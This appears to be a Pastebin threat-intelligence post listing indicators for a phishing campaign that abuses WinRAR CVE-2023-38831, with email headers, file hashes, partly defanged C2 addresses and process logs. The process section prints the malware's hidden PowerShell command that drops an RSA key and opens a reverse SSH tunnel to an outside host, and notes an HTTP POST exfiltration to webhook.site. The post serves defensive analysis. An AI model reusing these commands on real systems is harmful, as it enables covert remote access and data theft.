Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #RAR #202338831 #SSH #CMD #Powershell
- https://pastebin.com/2FvjfiEs
- previous_contact:
- https://pastebin.com/APaRNDHd
- FAQ:
- https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
- attack_vector
- --------------
- email attach .RAR (exploit) > .pdf .cmd > powershell > ssh > exfil
- # # # # # # # #
- email_headers
- # # # # # # # #
- Received: from 185_ .158_ .164_ .73
- Received: from 185_ .195_ .19_ .196
- From: jie_ .lin_ .wang_ @feber_ -co_ .com
- Date: Mon, 11 Sep 2023 10:02:53 +0300
- Subject: Updated: Нові індикатори кіберзагроз
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7
- File name IOC_09_11.rar [ WinRAR CVE-2023-38831 ]
- File size 234.38 KB (240000 bytes)
- SHA-256 91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a
- File name IOC_09_11.pdf .cmd
- File size 6.74 KB (6901 bytes)
- SHA-256 b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6
- File name IOC_09_11.pdf
- File size 261.03 KB (267296 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email_attach
- C2 46.4.105{ .116
- 216.66.35{ .145
- netwrk
- --------------
- 216.66.35{ .145 443 TCP 49301 → 443 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1
- 46.4.105{ .116 webhook{ .site 80 HTTP POST /e2831741-d8c8-4971-9464-e52d34f9d611 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
- comp
- --------------
- ssh.exe 1316 TCP 216.66.35{ .145 443 ESTABLISHED
- proc
- --------------
- C:\Program Files\WinRAR\WinRAR.exe
- C:\Windows\system32\cmd.exe /c ""C:\Users\support\AppData\Local\Temp\Rar$DIa3472.25027\IOC_09_11.pdf .cmd" "
- C:\Program Files\WinRAR\WinRAR.exe e -ibck "IOC_09_11.rar" *.* C:\Users\support\AppData\Local\Temp\
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "Set-Content -Path \"$($env:LOCALAPPDATA)\\Temp\\rsakey\" -Value \"-----BEGIN RSA ....
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$port=get-random -Minimum 10760 -Maximum 11290;start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -p443 root@216.66.35{ .145 -R 216.66.35P{ .145:$port -i $($env:LOCALAPPDATA)\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no\" -PassThru"
- C:\Program Files (x86)\OpenSSH\ssh.exe -N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:11146 -i C:\Users\support\AppData\Local\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand ...
- C:\Windows\system32\timeout.exe 3
- persist
- --------------
- n/a
- drop
- --------------
- %temp%\Rar$DIa3472.25027\IOC_09_11.pdf
- %temp%\Rar$DIa3472.25027\IOC_09_11.pdf .cmd
- C:\Users\support\.ssh\known_hosts
- %temp%\rsakey
- # # # # # # # #
- additional info
- # # # # # # # #
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7/details
- https://www.virustotal.com/gui/file/91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a/details
- https://analyze.intezer.com/analyses/f32a47c7-333b-4b4e-9b69-14ea0378c083
- https://www.virustotal.com/gui/file/b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6/details
- VR
Add Comment
Please, Sign In to add comment